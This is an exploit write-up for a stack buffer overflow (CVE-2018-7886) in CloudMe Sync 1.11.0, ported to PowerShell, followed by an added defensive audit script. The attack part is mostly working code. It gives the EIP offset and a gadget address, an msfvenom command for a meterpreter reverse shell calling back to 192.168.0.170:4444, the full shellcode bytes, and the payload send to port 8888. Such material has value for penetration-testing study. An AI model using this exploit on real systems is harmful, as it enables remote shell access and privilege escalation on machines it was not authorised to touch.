CloudMe Sync 1.11.0 - Local Stack-based Buffer Overflow (PowerShell)

The following post explains how to exploit a stack-based buffer overflow vulnerability in CloudMe Sync v1.11.0 via PowerShell.

Vulnerability

The vulnerability lies in the CloudMe Sync client, which listens on localhost on TCP port 8888.

Attack Vector

An attacker can send a specially crafted payload to the application on port 8888 to execute arbitrary code.

Threat

If the application is running with Administrator privileges, this can result in local privilege escalation. By default, the application listens on localhost only. However, if it is configured to listen on a public IP address, the same bug allows remote code execution, and an unauthenticated attacker can gain shell access to the target machine.

Proof-of-Concept

This is a PowerShell port of the exploit at https://bit.ly/3ko8I9H.

# Title: CloudMe Sync 1.11.0 - Local Stack-based Buffer Overflow (PowerShell)
# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
# Vendor Homepage: https://www.cloudme.com/en/sync
# Software Link: https://github.com/yaksas443/YaksasCSC-Lab/blob/master/PT-Lab/Exploits/CloudMe%20Sync/f0534b12cd51fefd44002862918801ab-CloudMe_1112.exe
# Version: v1.11.0
# Tested on: Windows 10
# CVE: CVE-2018-7886 (Prasenjit Kanti Paul)

# EIP overwritten by 316A4230 at offset 1052 (msf-pattern_offset -l 15000 -q 316A4230)
# JMP ESP equivalent (push esp # ret 0x04) in Qt5Network.dll, which is loaded without ASLR, rebase or SafeSEH:
# Address=699A0159 Message=  0x699a0159 : push esp # ret 0x04 |  {PAGE_EXECUTE_READ} [Qt5Network.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\ptlabmachine\AppData\Local\Programs\CloudMe\CloudMe\Qt5Network.dll)

# Shellcode command (bad characters must be quoted so the shell does not strip the backslashes):
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.170 LPORT=4444 -b '\x00\x0a' -f powershell

# Connect to the CloudMe Sync listener on the local machine
$tcpClient = New-Object System.Net.Sockets.TcpClient
$tcpClient.Connect("localhost", 8888)

[Byte[]] $buf = 0x33,0xc9,0x83,0xe9,0xaa,0xe8,0xff,0xff,0xff,0xff,0xc0,0x5e,0x81,0x76,0xe,0x55,0xe1,0x9b,0xb5,0x83,0xee,0xfc,0xe2,0xf4,0xa9,0x9,0x19,0xb5,0x55,0xe1,0xfb,0x3c,0xb0,0xd0,0x5b,0xd1,0xde,0xb1,0xab,0x3e,0x7,0xed,0x10,0xe7,0x41,0x6a,0xe9,0x9d,0x5a,0x56,0xd1,0x93,0x64,0x1e,0x37,0x89,0x34,0x9d,0x99,0x99,0x75,0x20,0x54,0xb8,0x54,0x26,0x79,0x47,0x7,0xb6,0x10,0xe7,0x45,0x6a,0xd1,0x89,0xde,0xad,0x8a,0xcd,0xb6,0xa9,0x9a,0x64,0x4,0x6a,0xc2,0x95,0x54,0x32,0x10,0xfc,0x4d,0x2,0xa1,0xfc,0xde,0xd5,0x10,0xb4,0x83,0xd0,0x64,0x19,0x94,0x2e,0x96,0xb4,0x92,0xd9,0x7b,0xc0,0xa3,0xe2,0xe6,0x4d,0x6e,0x9c,0xbf,0xc0,0xb1,0xb9,0x10,0xed,0x71,0xe0,0x48,0xd3,0xde,0xed,0xd0,0x3e,0xd,0xfd,0x9a,0x66,0xde,0xe5,0x10,0xb4,0x85,0x68,0xdf,0x91,0x71,0xba,0xc0,0xd4,0xc,0xbb,0xca,0x4a,0xb5,0xbe,0xc4,0xef,0xde,0xf3,0x70,0x38,0x8,0x89,0xa8,0x87,0x55,0xe1,0xf3,0xc2,0x26,0xd3,0xc4,0xe1,0x3d,0xad,0xec,0x93,0x52,0x68,0x73,0x4a,0x85,0x59,0xb,0xb4,0x55,0xe1,0xb2,0x71,0x1,0xb1,0xf3,0x9c,0xd5,0x8a,0x9b,0x4a,0x80,0x8b,0x91,0xdd,0x95,0x49,0x9b,0x1f,0x3d,0xe3,0x9b,0xa4,0x9,0x68,0x7d,0xe5,0x5,0xb1,0xcb,0xf5,0x5,0xa1,0xcb,0xdd,0xbf,0xee,0x44,0x55,0xaa,0x34,0xc,0xdf,0x45,0xb7,0xcc,0xdd,0xcc,0x44,0xef,0xd4,0xaa,0x34,0x1e,0x75,0x21,0xeb,0x64,0xfb,0x5d,0x94,0x77,0x5d,0x32,0xe1,0x9b,0xb5,0x3f,0xe1,0xf1,0xb1,0x3,0xb6,0xf3,0xb7,0x8c,0x29,0xc4,0x4a,0x80,0x62,0x63,0xb5,0x2b,0xd7,0x10,0x83,0x3f,0xa1,0xf3,0xb5,0x45,0xe1,0x9b,0xe3,0x3f,0xe1,0xf3,0xed,0xf1,0xb2,0x7e,0x4a,0x80,0x72,0xc8,0xdf,0x55,0xb7,0xc8,0xe2,0x3d,0xe3,0x42,0x7d,0xa,0x1e,0x4e,0x36,0xad,0xe1,0xe6,0x9d,0xd,0x89,0x9b,0xf5,0x55,0xe1,0xf1,0xb5,0x5,0x89,0x90,0x9a,0x5a,0xd1,0x64,0x60,0x2,0x89,0xee,0xdb,0x18,0x80,0x64,0x60,0xb,0xbf,0x64,0xb9,0x71,0xee,0x1e,0xc5,0xaa,0x1e,0x64,0x5c,0xce,0x1e,0x64,0x4a,0x54,0x22,0xb2,0x73,0x20,0x20,0x58,0xe,0xa5,0x54,0x39,0xe3,0x3f,0xe1,0xc8,0x4a,0x80,0xe1,0x9b,0xb5

# 0x41c (1052) bytes of padding up to EIP, the Qt5Network.dll address in little-endian byte order,
# a 100-byte NOP sled, then the shellcode
[Byte[]] $evilString = [Byte[]] (0x41) * 0x41c + [Byte[]] (0x59,0x01,0x9A,0x69) + [Byte[]] (0x90) * 100 + $buf

$clientStream = $tcpClient.GetStream()
$clientStream.Write($evilString, 0, $evilString.Length)
$clientStream.Flush()
$clientStream.Close()
$tcpClient.Close()

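As an added defender-side example (not part of the original post or the exploit author's code), the following PowerShell script audits a Windows host for the exposure described above: what is listening on TCP/8888, whether it is bound beyond loopback, who it runs as, and which of its loaded modules are built without ASLR, the property that gave Qt5Network.dll its fixed return address. It assumes Windows 8.1/Server 2012 R2 or later (for Get-NetTCPConnection); the port and the Qt5Network.dll finding come from the write-up, everything else is constructed here.

```powershell
# Added audit script (not from the original exploit). Lists TCP/8888 listeners,
# their owner and bind address, and loaded modules lacking
# IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040), i.e. modules with no ASLR.
function Test-DynamicBase {
    # $true/$false for the DYNAMIC_BASE flag of a PE file, $null if it cannot be read.
    param([Parameter(Mandatory)][string]$Path)
    try {
        $fs  = [System.IO.File]::OpenRead($Path)
        $hdr = New-Object byte[] 4096
        $n   = $fs.Read($hdr, 0, $hdr.Length)
        $fs.Dispose()
        if ($n -lt 0x40) { return $null }
        $pe = [BitConverter]::ToInt32($hdr, 0x3C)                             # e_lfanew
        if ($pe -lt 0 -or ($pe + 0x60) -gt $n) { return $null }                # header outside our 4 KiB read
        if ([BitConverter]::ToUInt32($hdr, $pe) -ne 0x4550) { return $null }   # "PE\0\0"
        # DllCharacteristics = PE signature (4) + COFF header (20) + offset 70 in the optional header
        $chars = [BitConverter]::ToUInt16($hdr, $pe + 0x5E)
        return (($chars -band 0x0040) -ne 0)
    } catch { return $null }
}

$Port = 8888   # CloudMe Sync listener port from the advisory
$listeners = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue
if (-not $listeners) { "Nothing is listening on TCP/$Port."; return }

foreach ($conn in $listeners) {
    $proc = Get-CimInstance Win32_Process -Filter "ProcessId = $($conn.OwningProcess)"
    if (-not $proc) { continue }                                               # process exited meanwhile
    $owner = Invoke-CimMethod -InputObject $proc -MethodName GetOwner
    $ownerName = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { '<unknown>' }
    $loopback = $conn.LocalAddress -in '127.0.0.1', '::1'

    "[$($proc.Name)] pid $($proc.ProcessId)  $($proc.ExecutablePath)"
    "  bound to $($conn.LocalAddress)  owner $ownerName"
    if (-not $loopback) { "  WARNING: reachable from the network -> remote code execution exposure" }
    if ($owner.User -eq 'SYSTEM' -or $owner.User -eq 'Administrator') {
        "  WARNING: listener runs as $ownerName -> local privilege escalation exposure"
    }
    # Modules without DYNAMIC_BASE keep a fixed load address; these are the ones to mitigate.
    $mods = try { (Get-Process -Id $proc.ProcessId -ErrorAction Stop).Modules } catch { @() }
    foreach ($m in $mods) {
        if ((Test-DynamicBase $m.FileName) -eq $false) { "  no ASLR: $($m.ModuleName)  $($m.FileName)" }
    }
}
```

Run it from an elevated shell so the module list of an Administrator-owned process can be read. Modules reported without ASLR can be covered by Exploit Protection's "Force randomization for images (Mandatory ASLR)" until the vendor rebuilds them, and a listener bound to anything other than loopback should be moved back to 127.0.0.1 or blocked at the host firewall.
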
Written on August 7, 2020